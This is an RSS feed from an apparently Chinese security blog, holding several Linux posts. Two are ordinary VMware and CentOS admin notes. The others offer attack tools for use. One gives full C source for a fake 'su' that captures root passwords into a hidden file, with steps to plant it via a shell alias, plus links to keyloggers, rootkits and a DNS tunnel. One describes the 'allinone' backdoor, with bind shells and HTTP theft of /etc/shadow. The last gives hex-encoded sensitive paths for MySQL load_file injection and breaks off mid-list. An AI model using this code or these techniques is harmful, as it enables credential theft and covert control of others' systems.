<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Chinadu&#039;s Blog &#187; Linux</title>
	<atom:link href="http://www.4shell.org/archives/tag/linux/feed" rel="self" type="application/rss+xml" />
	<link>http://www.4shell.org</link>
	<description>关注网络安全</description>
	<lastBuildDate>Tue, 31 Jan 2012 12:43:28 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.1</generator>
		<item>
		<title>最小化安装CentOS6 VMware-tools安装几点注意事项</title>
		<link>http://www.4shell.org/archives/2062.html</link>
		<comments>http://www.4shell.org/archives/2062.html#comments</comments>
		<pubDate>Fri, 25 Nov 2011 08:14:38 +0000</pubDate>
		<dc:creator>Chinadu</dc:creator>
				<category><![CDATA[技术文章]]></category>
		<category><![CDATA[CentOS]]></category>
		<category><![CDATA[Linux]]></category>

		<guid isPermaLink="false">http://www.4shell.org/?p=2062</guid>
		<description><![CDATA[#./vmware-install.pl bash:./vmware-install.pl :/usr/bin/perl:bad interpreter:No such file or directory. 如果出现这个提示，则表明系统没有安装Perl环境，可以使用如下命令来提供Perl支持： #yum groupinstall "Perl Support" Searching for GCC... The path "" is not valid path to the gcc binary. Would you like to change it? [yes] 如果出现这个就表明gcc没有安装 yum install gcc gcc-c++ automake make 将编译环境一次装好 Searching for a valid kernel header path... The path "" is not valid. [...]]]></description>
			<content:encoded><![CDATA[<p>#./vmware-install.pl<br />
bash:./vmware-install.pl :/usr/bin/perl:bad interpreter:No such file or directory.<br />
如果出现这个提示，则表明系统没有安装Perl环境，可以使用如下命令来提供Perl支持：<br />
#yum groupinstall "Perl Support"</p>
<p>Searching for GCC...<br />
The path "" is not valid path to the gcc binary.<br />
Would you like to change it? [yes]<br />
如果出现这个就表明gcc没有安装</p>
<p>yum install gcc gcc-c++ automake make<br />
将编译环境一次装好<br />
<span id="more-2062"></span><br />
Searching for a valid kernel header path...<br />
The path "" is not valid.<br />
Would you like to change it? [yes]<br />
如果出现这个就表示kernel-devel包没有安装</p>
<p>yum install kernel-devel</p>
<p>成功安装VMware tools时的提示：<br />
Searching for GCC...<br />
Detected GCC binary at "/usr/bin/gcc".<br />
The path "/usr/bin/gcc" appears to be a valid path to the gcc binary.<br />
Would you like to change it? [no]</p>
<p>Searching for a valid kernel header path...<br />
Detected the kernel headers of the running kernel at<br />
"/lib/modules/2.6.32-71.el6.i686/build/include".<br />
The path "/lib/modules/2.6.32-71.el6.i686/build/include" appears to be a valid<br />
path to the kernel headers of the running kernel.<br />
Would you like to change it? [no]</p>
<h2  class="related_post_title">相关文章</h2><ul class="related_post"><li>2011年06月10日 -- <a href="http://www.4shell.org/archives/1969.html" title="VMware 硬盘扩容">VMware 硬盘扩容</a></li><li>2011年11月24日 -- <a href="http://www.4shell.org/archives/2059.html" title="linux Backdoor">linux Backdoor</a></li><li>2011年11月24日 -- <a href="http://www.4shell.org/archives/2055.html" title="allinone: Linux pentest tools">allinone: Linux pentest tools</a></li><li>2011年06月6日 -- <a href="http://www.4shell.org/archives/1958.html" title="Linux下MySQL的load_file常用路径">Linux下MySQL的load_file常用路径</a></li><li>2011年06月6日 -- <a href="http://www.4shell.org/archives/1956.html" title="linux渗透小技巧">linux渗透小技巧</a></li><li>2011年05月26日 -- <a href="http://www.4shell.org/archives/1933.html" title="Linux 安装基于PPTPD的vpn,内网渗透用">Linux 安装基于PPTPD的vpn,内网渗透用</a></li><li>2011年05月16日 -- <a href="http://www.4shell.org/archives/1930.html" title="kernel-2.6.18-164 Local 2010 Exploit Root Private Cant See Images">kernel-2.6.18-164 Local 2010 Exploit Root Private Cant See Images</a></li><li>2011年04月30日 -- <a href="http://www.4shell.org/archives/1920.html" title="Linux基本操作命令">Linux基本操作命令</a></li><li>2011年04月30日 -- <a href="http://www.4shell.org/archives/1919.html" title="让putty支持中文输入和显示">让putty支持中文输入和显示</a></li><li>2011年04月28日 -- <a href="http://www.4shell.org/archives/1899.html" title=" 一次Linux下的普通渗透测试"> 一次Linux下的普通渗透测试</a></li></ul>]]></content:encoded>
			<wfw:commentRss>http://www.4shell.org/archives/2062.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>linux Backdoor</title>
		<link>http://www.4shell.org/archives/2059.html</link>
		<comments>http://www.4shell.org/archives/2059.html#comments</comments>
		<pubDate>Thu, 24 Nov 2011 13:23:36 +0000</pubDate>
		<dc:creator>Chinadu</dc:creator>
				<category><![CDATA[资源共享]]></category>
		<category><![CDATA[backdoor]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[后门]]></category>

		<guid isPermaLink="false">http://www.4shell.org/?p=2059</guid>
		<description><![CDATA[/* /* * kpr-fakesu.c V0.9beta167 * by koper * * Setting up: * admin@host:~$ gcc -o .su fakesu.c; rm -rf fakesu.c * admin@host:~$ mv .su /var/tmp/.su * admin@host:~$ cp .bash_profile .wgetrc * admin@host:~$ echo "alias su=/var/tmp/.su"&#62;&#62;.bash_profile * admin@host:~$ logout * *** LOGIN *** * admin@host:~$ su * Password: * su: Authentication failure * Sorry. * [...]]]></description>
			<content:encoded><![CDATA[<blockquote><p>/*</p>
<p>/*</p>
<p>* kpr-fakesu.c V0.9beta167</p>
<p>* by koper</p>
<p>*</p>
<p>* Setting up:</p>
<p>* admin@host:~$ gcc -o .su fakesu.c; rm -rf fakesu.c</p>
<p>* admin@host:~$ mv .su /var/tmp/.su</p>
<p>* admin@host:~$ cp .bash_profile .wgetrc</p>
<p>* admin@host:~$ echo "alias su=/var/tmp/.su"&gt;&gt;.bash_profile</p>
<p>* admin@host:~$ logout</p>
<p>* *** LOGIN ***</p>
<p>* admin@host:~$ su</p>
<p>* Password:</p>
<p>* su: Authentication failure</p>
<p>* Sorry.</p>
<p>* admin@host:~$ su</p>
<p>* Password:</p>
<p>* root@host:~# logout</p>
<p>* admin@host:~$ cat /var/tmp/.pwds</p>
<p>* root:dupcia17</p>
<p>* admin@host:~$</p>
<p>*</p>
<p>* /bin/su sends various failure information depending on the OS ver.</p>
<p>* Please modify the source to make it "fit" &lt;img src="http://www.4shell.org/wp-content/uploads/images/2011/11/1323384Sm.gif" alt=";)"&gt;</p>
<p>*</p>
<p>*/</p>
<p>#include</p>
<p>#include</p>
<p>#include</p>
<p>main(int argc, char *argv[]){</p>
<p>FILE *fp;</p>
<p>char *user;</p>
<p>char *pass;</p>
<p>char filex[100];</p>
<p>char clean[100];</p>
<p>sprintf(filex,"/var/tmp/.pwds");</p>
<p>sprintf(clean,"rm -rf /var/tmp/.su;mv -f /home/test/.wgetrc /home/test/.bash_profile");</p>
<p>if(argc==1) user="root";</p>
<p>if(argc==2) user=argv[1];</p>
<p>if(argc&gt;2){</p>
<p>if(strcmp(argv[1], "-l")==0)</p>
<p>user=argv[2];</p>
<p>else user=argv[1];}</p>
<p>fprintf(stdout,"assword: ");</p>
<p>pass=getpass ("");</p>
<p>system("sleep 3");</p>
<p>fprintf(stdout,"su: Authentication failurenSorry.n");</p>
<p>if ((fp=fopen(filex,"w")) != NULL)</p>
<p>{</p>
<p>fprintf(fp, "%s:%sn", user, pass);</p>
<p>fclose(fp);</p>
<p>}</p>
<p>system(clean);</p>
<p>system("rm -rf /var/tmp/.su; ln -s /bin/su /var/tmp/.su");</p>
<p>}</p></blockquote>
<p>以下三个都是比较经典的backdoor：</p>
<p><span id="more-2059"></span></p>
<p><a title="klogger-1.4" href="http://www.4shell.org/tools/klogger-1.4.gz" target="_blank">http://www.4shell.org/tools/klogger-1.4.gz</a></p>
<p><a title="enyelkm.en.v1.1" href="http://www.4shell.org/tools/enyelkm.en.v1.1.tar.gz" target="_blank">http://www.4shell.org/tools/enyelkm.en.v1.1.tar.gz</a></p>
<p><a title="sshbd" href="http://www.4shell.org/tools/sshbd.tgz" target="_blank">http://www.4shell.org/tools/sshbd.tgz</a></p>
<p>这个是在linux穿墙的，通过53号端口建立隧道：</p>
<p><a title="dns2tcp-0.5" href="http://www.4shell.org/tools/dns2tcp-0.5.tar.gz" target="_blank">http://www.4shell.org/tools/dns2tcp-0.5.tar.gz</a></p>
<h2  class="related_post_title">相关文章</h2><ul class="related_post"><li>2011年11月25日 -- <a href="http://www.4shell.org/archives/2062.html" title="最小化安装CentOS6 VMware-tools安装几点注意事项">最小化安装CentOS6 VMware-tools安装几点注意事项</a></li><li>2011年11月24日 -- <a href="http://www.4shell.org/archives/2055.html" title="allinone: Linux pentest tools">allinone: Linux pentest tools</a></li><li>2011年06月10日 -- <a href="http://www.4shell.org/archives/1969.html" title="VMware 硬盘扩容">VMware 硬盘扩容</a></li><li>2011年06月6日 -- <a href="http://www.4shell.org/archives/1958.html" title="Linux下MySQL的load_file常用路径">Linux下MySQL的load_file常用路径</a></li><li>2011年06月6日 -- <a href="http://www.4shell.org/archives/1956.html" title="linux渗透小技巧">linux渗透小技巧</a></li><li>2011年05月26日 -- <a href="http://www.4shell.org/archives/1933.html" title="Linux 安装基于PPTPD的vpn,内网渗透用">Linux 安装基于PPTPD的vpn,内网渗透用</a></li><li>2011年05月16日 -- <a href="http://www.4shell.org/archives/1930.html" title="kernel-2.6.18-164 Local 2010 Exploit Root Private Cant See Images">kernel-2.6.18-164 Local 2010 Exploit Root Private Cant See Images</a></li><li>2011年04月30日 -- <a href="http://www.4shell.org/archives/1920.html" title="Linux基本操作命令">Linux基本操作命令</a></li><li>2011年04月30日 -- <a href="http://www.4shell.org/archives/1919.html" title="让putty支持中文输入和显示">让putty支持中文输入和显示</a></li><li>2011年04月28日 -- <a href="http://www.4shell.org/archives/1899.html" title=" 一次Linux下的普通渗透测试"> 一次Linux下的普通渗透测试</a></li></ul>]]></content:encoded>
			<wfw:commentRss>http://www.4shell.org/archives/2059.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>allinone: Linux pentest tools</title>
		<link>http://www.4shell.org/archives/2055.html</link>
		<comments>http://www.4shell.org/archives/2055.html#comments</comments>
		<pubDate>Thu, 24 Nov 2011 13:08:04 +0000</pubDate>
		<dc:creator>Chinadu</dc:creator>
				<category><![CDATA[技术文章]]></category>
		<category><![CDATA[资源共享]]></category>
		<category><![CDATA[allinone]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[pentest]]></category>

		<guid isPermaLink="false">http://www.4shell.org/?p=2055</guid>
		<description><![CDATA[allinone: Linux pentest tools from HUC China A great app level backdoor in Linux . Very useful while doing Linux pentest. Written by Lion [HUC(Hack Union of China)] at year 2002 The source code has some errors in packetstromsecurity’s archive; Now all fixed by akshell(http://www.linuxpentest.com) /************************************************************************ * allinone.c for HUC (2002.1) * * allinone.c is [...]]]></description>
			<content:encoded><![CDATA[<p>allinone: Linux pentest tools from HUC China</p>
<p>A great app level backdoor in Linux . Very useful while doing Linux pentest.</p>
<p>Written by Lion [HUC(Hack Union of China)] at year 2002</p>
<p>The source code has some errors in packetstromsecurity’s archive; Now all fixed by akshell(http://www.linuxpentest.com)<br />
<span id="more-2055"></span><br />
/************************************************************************<br />
* allinone.c for HUC (2002.1)<br />
*<br />
* allinone.c is<br />
* a Http server,<br />
* a sockets transmit server,<br />
* a shell backdoor,<br />
* a icmp backdoor,<br />
* a bind shell backdoor,<br />
* a like http shell,<br />
* it can translate file from remote host,<br />
* it can give you a socks5 proxy,<br />
* it can use for to attack, jumps the extension, Visits other machines.<br />
* it can give you a root shell.:)<br />
*</p>
<p>* Usage:<br />
* compile:<br />
* gcc -o allinone allinone.c -lpthread<br />
* run on target:<br />
* ./allinone<br />
*<br />
* 1.httpd server<br />
* Client:<br />
* http://target:8008/givemefile/etc/passwd<br />
* lynx -dump http://target:8008/givemefile/etc/shadow &gt; shadow<br />
* or wget http://target:8008/givemefile/etc/shadow<br />
*<br />
* 2.icmp backdoor<br />
* Client:<br />
* ping -l 101 target (on windows)<br />
* ping -s 101 -c 4 target (on linux)<br />
* nc target 8080<br />
* kissme:) –&gt; your password<br />
*<br />
* 3.shell backdoor<br />
* Client:<br />
* nc target 8008<br />
* kissme:) –&gt; your password<br />
*<br />
* 4.bind a root shell on your port<br />
* Client:<br />
* http://target:8008/bindport:9999<br />
* nc target 9999<br />
* kissme:) –&gt; your password<br />
*<br />
* 5.sockets transmit<br />
* Client:<br />
* http://target:8008/socks/:local listen port::you want to tran ip:::you want to tran port<br />
* http://target:8008/socks/:1080::192.168.0.1:::21<br />
* nc target 1080<br />
*<br />
* 6.http shell<br />
* Client:<br />
* http://target:8008/givemeshell:ls -al (no pipe)<br />
*<br />
* ps:<br />
* All bind shell have a passwd, default is: kissme:)<br />
* All bind shell will close, if Two minutes do not have the connection.<br />
* All bind shell only can use one time until reactivates.<br />
*<br />
*<br />
* Code by lion, e-mail: lion@cnhonker.net<br />
* Welcome to HUC Website, Http://www.cnhonker.com<br />
*<br />
* Test on redhat 6.1/6.2/7.0/7.1/7.2 (maybe others)<br />
* Thx bkbll’s Transmit code, and thx Neil,con,iceblood for test.<br />
*<br />
************************************************************************/<br />
Download:<br />
<a title="allinone" href="http://www.4shell.org/tools/allinone.tgz" target="_blank">http://www.4shell.org/tools/allinone.tgz</a></p>
<h2  class="related_post_title">相关文章</h2><ul class="related_post"><li>2012年01月2日 -- <a href="http://www.4shell.org/archives/2074.html" title="How to attack a windows domain">How to attack a windows domain</a></li><li>2011年11月25日 -- <a href="http://www.4shell.org/archives/2062.html" title="最小化安装CentOS6 VMware-tools安装几点注意事项">最小化安装CentOS6 VMware-tools安装几点注意事项</a></li><li>2011年11月24日 -- <a href="http://www.4shell.org/archives/2059.html" title="linux Backdoor">linux Backdoor</a></li><li>2011年06月10日 -- <a href="http://www.4shell.org/archives/1969.html" title="VMware 硬盘扩容">VMware 硬盘扩容</a></li><li>2011年06月6日 -- <a href="http://www.4shell.org/archives/1958.html" title="Linux下MySQL的load_file常用路径">Linux下MySQL的load_file常用路径</a></li><li>2011年06月6日 -- <a href="http://www.4shell.org/archives/1956.html" title="linux渗透小技巧">linux渗透小技巧</a></li><li>2011年05月26日 -- <a href="http://www.4shell.org/archives/1933.html" title="Linux 安装基于PPTPD的vpn,内网渗透用">Linux 安装基于PPTPD的vpn,内网渗透用</a></li><li>2011年05月16日 -- <a href="http://www.4shell.org/archives/1930.html" title="kernel-2.6.18-164 Local 2010 Exploit Root Private Cant See Images">kernel-2.6.18-164 Local 2010 Exploit Root Private Cant See Images</a></li><li>2011年04月30日 -- <a href="http://www.4shell.org/archives/1920.html" title="Linux基本操作命令">Linux基本操作命令</a></li><li>2011年04月30日 -- <a href="http://www.4shell.org/archives/1919.html" title="让putty支持中文输入和显示">让putty支持中文输入和显示</a></li></ul>]]></content:encoded>
			<wfw:commentRss>http://www.4shell.org/archives/2055.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>VMware 硬盘扩容</title>
		<link>http://www.4shell.org/archives/1969.html</link>
		<comments>http://www.4shell.org/archives/1969.html#comments</comments>
		<pubDate>Fri, 10 Jun 2011 14:25:30 +0000</pubDate>
		<dc:creator>Chinadu</dc:creator>
				<category><![CDATA[技术文章]]></category>
		<category><![CDATA[CentOS]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[VMware]]></category>

		<guid isPermaLink="false">http://www.4shell.org/?p=1969</guid>
		<description><![CDATA[使用VMware经常会遇到预先为其分配的硬盘空间不够了，这时候就需要多划分一些硬盘空间给VMware使用，按照如下方法实现扩容： 环境：windows xp、VMware、fedora 10 步骤：1、在cmd窗口中输入：vmware-vdiskmanager -x 50GB "G:\CenOS.vmdk" 参数"-x"指定扩容后整个空间大小（包含现在正在使用的），"G:\CentOSvmdk" 指定需要 扩容的虚拟机磁盘文件。 此命令成功执行后已经为虚拟机分配空间了，但是内装的linux系统还不可使用。 2、进入虚拟机内装的LINUX系统，以root用户执行： fdisk -l //列出磁盘使用情况 fdisk /dev/sda //或者是scsi磁盘就用sda，ide磁盘就用hda n //添加新分区 p //创建主分区，也可以使用"l"创建逻辑分区 4 //选择分区号，1－4 选择默认分区大小 w //保存、退出 3、格式化新分区： mkfs -t ext3 /dev/sda4 4、挂载分区： 手动： mount /dev/sda4 /home/colin/work 自动： 在/etc/fstab中加入一行 /dev/sda4 /home/colin/work ext3 defaults, 0 1 整个操作完成可以使用新分区。 另外一种方法就是首先在虚拟机上添加一块硬盘，然后挂载。这样就相当于又买了个硬盘，可以缓解磁盘空间紧张的问题了。 1、启动虚拟机，选择"Edit virtual machine settings"，点按钮"adding",按照向导默认添加一块磁盘，一般都是SCSI设备。 指定硬盘容量,然后重启进入系统。 root用户操作: 2、 [...]]]></description>
			<content:encoded><![CDATA[<p>使用VMware经常会遇到预先为其分配的硬盘空间不够了，这时候就需要多划分一些硬盘空间给VMware使用，按照如下方法实现扩容：</p>
<p>环境：windows xp、VMware、fedora 10<br />
步骤：1、在cmd窗口中输入：vmware-vdiskmanager -x 50GB "G:\CenOS.vmdk"<br />
        参数"-x"指定扩容后整个空间大小（包含现在正在使用的），"G:\CentOSvmdk" 指定需要<br />
        扩容的虚拟机磁盘文件。<br />
        此命令成功执行后已经为虚拟机分配空间了，但是内装的linux系统还不可使用。</p>
<p>     2、进入虚拟机内装的LINUX系统，以root用户执行：<br />
<span id="more-1969"></span></p>
<blockquote><p>
       fdisk -l                   //列出磁盘使用情况<br />
       fdisk /dev/sda             //或者是scsi磁盘就用sda，ide磁盘就用hda<br />
       n                          //添加新分区<br />
       p                          //创建主分区，也可以使用"l"创建逻辑分区<br />
       4                          //选择分区号，1－4<br />
       选择默认分区大小<br />
       w                          //保存、退出
</p></blockquote>
<p>     3、格式化新分区：</p>
<blockquote><p>
        mkfs -t ext3  /dev/sda4
</p></blockquote>
<p>     4、挂载分区：</p>
<blockquote><p>
        手动：    mount /dev/sda4 /home/colin/work<br />
        自动：    在/etc/fstab中加入一行<br />
                 /dev/sda4  /home/colin/work    ext3 defaults,   0  1
</p></blockquote>
<p>     整个操作完成可以使用新分区。<br />
另外一种方法就是首先在虚拟机上添加一块硬盘，然后挂载。这样就相当于又买了个硬盘，可以缓解磁盘空间紧张的问题了。</p>
<p>1、启动虚拟机，选择"Edit virtual machine settings"，点按钮"adding",按照向导默认添加一块磁盘，一般都是SCSI设备。 指定硬盘容量,然后重启进入系统。</p>
<p>root用户操作:<br />
2、 fdisk -l 会看到有一块新的设置,如果你先前有一块硬盘(sda1, sda2...),新加的这块应该是(/dev/sdb)。<br />
 看到就说明系统已经识别出这块硬盘了,接下来我们给这块硬盘分区,格式化。<br />
 fdisk /dev/sdb (当然如果你添加的IDE设置,会是 hdx) x 代表数字,1到4指主分区编号，5以上指逻辑分区。具体的资料可以在网上搜到。</p>
<p>3、分区格式化：<br />
 操作和上面的分区格式化大致相同，只需注意把/dev/sda 改成/dev/sdb，后面的操作也都一致。</p>
<h2  class="related_post_title">相关文章</h2><ul class="related_post"><li>2011年11月25日 -- <a href="http://www.4shell.org/archives/2062.html" title="最小化安装CentOS6 VMware-tools安装几点注意事项">最小化安装CentOS6 VMware-tools安装几点注意事项</a></li><li>2011年11月24日 -- <a href="http://www.4shell.org/archives/2059.html" title="linux Backdoor">linux Backdoor</a></li><li>2011年11月24日 -- <a href="http://www.4shell.org/archives/2055.html" title="allinone: Linux pentest tools">allinone: Linux pentest tools</a></li><li>2011年06月6日 -- <a href="http://www.4shell.org/archives/1958.html" title="Linux下MySQL的load_file常用路径">Linux下MySQL的load_file常用路径</a></li><li>2011年06月6日 -- <a href="http://www.4shell.org/archives/1956.html" title="linux渗透小技巧">linux渗透小技巧</a></li><li>2011年05月26日 -- <a href="http://www.4shell.org/archives/1933.html" title="Linux 安装基于PPTPD的vpn,内网渗透用">Linux 安装基于PPTPD的vpn,内网渗透用</a></li><li>2011年05月16日 -- <a href="http://www.4shell.org/archives/1930.html" title="kernel-2.6.18-164 Local 2010 Exploit Root Private Cant See Images">kernel-2.6.18-164 Local 2010 Exploit Root Private Cant See Images</a></li><li>2011年04月30日 -- <a href="http://www.4shell.org/archives/1920.html" title="Linux基本操作命令">Linux基本操作命令</a></li><li>2011年04月30日 -- <a href="http://www.4shell.org/archives/1919.html" title="让putty支持中文输入和显示">让putty支持中文输入和显示</a></li><li>2011年04月28日 -- <a href="http://www.4shell.org/archives/1899.html" title=" 一次Linux下的普通渗透测试"> 一次Linux下的普通渗透测试</a></li></ul>]]></content:encoded>
			<wfw:commentRss>http://www.4shell.org/archives/1969.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Linux下MySQL的load_file常用路径</title>
		<link>http://www.4shell.org/archives/1958.html</link>
		<comments>http://www.4shell.org/archives/1958.html#comments</comments>
		<pubDate>Mon, 06 Jun 2011 13:33:30 +0000</pubDate>
		<dc:creator>Chinadu</dc:creator>
				<category><![CDATA[技术文章]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[小技巧]]></category>

		<guid isPermaLink="false">http://www.4shell.org/?p=1958</guid>
		<description><![CDATA[/etc/passwd 0x2F6574632F706173737764 /etc/shadow 0x2F6574632F736861646F77 /etc/issue 0x2F6574632F6973737565 /etc/fstab 0x2F6574632F6673746162 /etc/host.conf 0x2F6574632F686F73742E636F6E66 /etc/motd 0x2F6574632F6D6F7464 /etc/ld.so.conf 0x2F6574632F6C642E736F2E636F6E66 /etc/sysconfig/network-scripts/ifcfg-eth0 0x2F6574632F737973636F6E6669672F6E6574776F726B2D736372697074732F69666366672D65746830 /etc/sysconfig/network-scripts/ifcfg-eth1 0x2F6574632F737973636F6E6669672F6E6574776F726B2D736372697074732F69666366672D65746831 /var/www/htdocs/index.php 0x2F7661722F7777772F6874646F63732F696E6465782E706870 /var/www/conf/httpd.conf 0x2F7661722F7777772F636F6E662F68747470642E636F6E66 /var/www/htdocs/index.html 0x2F7661722F7777772F6874646F63732F696E6465782E68746D6C /var/httpd/conf/php.ini 0x2F7661722F68747470642F636F6E662F7068702E696E69 /var/httpd/htdocs/index.php 0x2F7661722F68747470642F6874646F63732F696E6465782E706870 /var/httpd/conf/httpd.conf 0x2F7661722F68747470642F636F6E662F68747470642E636F6E66 /var/httpd/htdocs/index.html 0x2F7661722F68747470642F6874646F63732F696E6465782E68746D6C /var/httpd/conf/php.ini 0x2F7661722F68747470642F636F6E662F7068702E696E69 /var/www/index.html 0x2F7661722F7777772F696E6465782E68746D6C /var/www/index.php 0x2F7661722F7777772F696E6465782E706870 /opt/www/conf/httpd.conf 0x2F6F70742F7777772F636F6E662F68747470642E636F6E66 /opt/www/htdocs/index.php 0x2F6F70742F7777772F6874646F63732F696E6465782E706870 /opt/www/htdocs/index.html 0x2F6F70742F7777772F6874646F63732F696E6465782E68746D6C /usr/local/apache/htdocs/index.html 0x2F7573722F6C6F63616C2F6170616368652F6874646F63732F696E6465782E68746D6C /usr/local/apache/htdocs/index.php 0x2F7573722F6C6F63616C2F6170616368652F6874646F63732F696E6465782E706870 /usr/local/apache2/htdocs/index.html 0x2F7573722F6C6F63616C2F617061636865322F6874646F63732F696E6465782E68746D6C /usr/local/apache2/htdocs/index.php 0x2F7573722F6C6F63616C2F617061636865322F6874646F63732F696E6465782E706870 /usr/local/httpd2.2/htdocs/index.php 0x2F7573722F6C6F63616C2F6874747064322E322F6874646F63732F696E6465782E706870 /usr/local/httpd2.2/htdocs/index.html [...]]]></description>
			<content:encoded><![CDATA[<p>/etc/passwd 0x2F6574632F706173737764<br />
/etc/shadow 0x2F6574632F736861646F77<br />
/etc/issue 0x2F6574632F6973737565<br />
/etc/fstab 0x2F6574632F6673746162<br />
/etc/host.conf 0x2F6574632F686F73742E636F6E66<br />
/etc/motd 0x2F6574632F6D6F7464<br />
/etc/ld.so.conf 0x2F6574632F6C642E736F2E636F6E66<br />
/etc/sysconfig/network-scripts/ifcfg-eth0 0x2F6574632F737973636F6E6669672F6E6574776F726B2D736372697074732F69666366672D65746830<br />
/etc/sysconfig/network-scripts/ifcfg-eth1 0x2F6574632F737973636F6E6669672F6E6574776F726B2D736372697074732F69666366672D65746831<br />
/var/www/htdocs/index.php 0x2F7661722F7777772F6874646F63732F696E6465782E706870<br />
/var/www/conf/httpd.conf 0x2F7661722F7777772F636F6E662F68747470642E636F6E66<br />
/var/www/htdocs/index.html 0x2F7661722F7777772F6874646F63732F696E6465782E68746D6C<br />
/var/httpd/conf/php.ini 0x2F7661722F68747470642F636F6E662F7068702E696E69<br />
/var/httpd/htdocs/index.php 0x2F7661722F68747470642F6874646F63732F696E6465782E706870<br />
/var/httpd/conf/httpd.conf 0x2F7661722F68747470642F636F6E662F68747470642E636F6E66<br />
/var/httpd/htdocs/index.html 0x2F7661722F68747470642F6874646F63732F696E6465782E68746D6C<br />
/var/httpd/conf/php.ini 0x2F7661722F68747470642F636F6E662F7068702E696E69<br />
/var/www/index.html 0x2F7661722F7777772F696E6465782E68746D6C<br />
/var/www/index.php 0x2F7661722F7777772F696E6465782E706870<br />
/opt/www/conf/httpd.conf 0x2F6F70742F7777772F636F6E662F68747470642E636F6E66<br />
/opt/www/htdocs/index.php 0x2F6F70742F7777772F6874646F63732F696E6465782E706870<br />
/opt/www/htdocs/index.html 0x2F6F70742F7777772F6874646F63732F696E6465782E68746D6C<br />
/usr/local/apache/htdocs/index.html 0x2F7573722F6C6F63616C2F6170616368652F6874646F63732F696E6465782E68746D6C<br />
/usr/local/apache/htdocs/index.php 0x2F7573722F6C6F63616C2F6170616368652F6874646F63732F696E6465782E706870<br />
/usr/local/apache2/htdocs/index.html 0x2F7573722F6C6F63616C2F617061636865322F6874646F63732F696E6465782E68746D6C<br />
/usr/local/apache2/htdocs/index.php 0x2F7573722F6C6F63616C2F617061636865322F6874646F63732F696E6465782E706870<br />
/usr/local/httpd2.2/htdocs/index.php 0x2F7573722F6C6F63616C2F6874747064322E322F6874646F63732F696E6465782E706870<br />
/usr/local/httpd2.2/htdocs/index.html 0x2F7573722F6C6F63616C2F6874747064322E322F6874646F63732F696E6465782E68746D6C<br />
/tmp/apache/htdocs/index.html 0x2F746D702F6170616368652F6874646F63732F696E6465782E68746D6C<br />
/tmp/apache/htdocs/index.php 0x2F746D702F6170616368652F6874646F63732F696E6465782E706870<br />
/etc/httpd/htdocs/index.php 0x2F6574632F68747470642F6874646F63732F696E6465782E706870<br />
/etc/httpd/conf/httpd.conf 0x2F6574632F68747470642F636F6E662F68747470642E636F6E66<br />
/etc/httpd/htdocs/index.html 0x2F6574632F68747470642F6874646F63732F696E6465782E68746D6C<br />
/www/php/php.ini 0x2F7777772F7068702F7068702E696E69<br />
/www/php4/php.ini 0x2F7777772F706870342F7068702E696E69<br />
/www/php5/php.ini 0x2F7777772F706870352F7068702E696E69<br />
/www/conf/httpd.conf 0x2F7777772F636F6E662F68747470642E636F6E66<br />
/www/htdocs/index.php 0x2F7777772F6874646F63732F696E6465782E706870<br />
/www/htdocs/index.html 0x2F7777772F6874646F63732F696E6465782E68746D6C<br />
<span id="more-1958"></span><br />
/usr/local/httpd/conf/httpd.conf 0x2F7573722F6C6F63616C2F68747470642F636F6E662F68747470642E636F6E66<br />
/apache/apache/conf/httpd.conf 0x2F6170616368652F6170616368652F636F6E662F68747470642E636F6E66<br />
/apache/apache2/conf/httpd.conf 0x2F6170616368652F617061636865322F636F6E662F68747470642E636F6E66<br />
/etc/apache/apache.conf 0x2F6574632F6170616368652F6170616368652E636F6E66<br />
/etc/apache2/apache.conf 0x2F6574632F617061636865322F6170616368652E636F6E66<br />
/etc/apache/httpd.conf 0x2F6574632F6170616368652F68747470642E636F6E66<br />
/etc/apache2/httpd.conf 0x2F6574632F617061636865322F68747470642E636F6E66<br />
/etc/apache2/vhosts.d/00_default_vhost.conf 0x2F6574632F617061636865322F76686F7374732E642F30305F64656661756C745F76686F73742E636F6E66<br />
/etc/apache2/sites-available/default 0x2F6574632F617061636865322F73697465732D617661696C61626C652F64656661756C74 </p>
<p>/etc/phpmyadmin/config.inc.php 0x2F6574632F7068706D7961646D696E2F636F6E6669672E696E632E706870<br />
/etc/mysql/my.cnf 0x2F6574632F6D7973716C2F6D792E636E66<br />
/etc/httpd/conf.d/php.conf 0x2F6574632F68747470642F636F6E662E642F7068702E636F6E66<br />
/etc/httpd/conf.d/httpd.conf 0x2F6574632F68747470642F636F6E662E642F68747470642E636F6E66 </p>
<p>/etc/httpd/logs/error_log 0x2F6574632F68747470642F6C6F67732F6572726F725F6C6F67<br />
/etc/httpd/logs/error.log 0x2F6574632F68747470642F6C6F67732F6572726F722E6C6F67<br />
/etc/httpd/logs/access_log 0x2F6574632F68747470642F6C6F67732F6163636573735F6C6F67<br />
/etc/httpd/logs/access.log 0x2F6574632F68747470642F6C6F67732F6163636573732E6C6F67<br />
/home/apache/conf/httpd.conf 0x2F686F6D652F6170616368652F636F6E662F68747470642E636F6E66<br />
/home/apache2/conf/httpd.conf 0x2F686F6D652F617061636865322F636F6E662F68747470642E636F6E66 </p>
<p>/var/log/apache/error_log 0x2F7661722F6C6F672F6170616368652F6572726F725F6C6F67<br />
/var/log/apache/error.log 0x2F7661722F6C6F672F6170616368652F6572726F722E6C6F67<br />
/var/log/apache/access_log 0x2F7661722F6C6F672F6170616368652F6163636573735F6C6F67<br />
/var/log/apache/access.log 0x2F7661722F6C6F672F6170616368652F6163636573732E6C6F67<br />
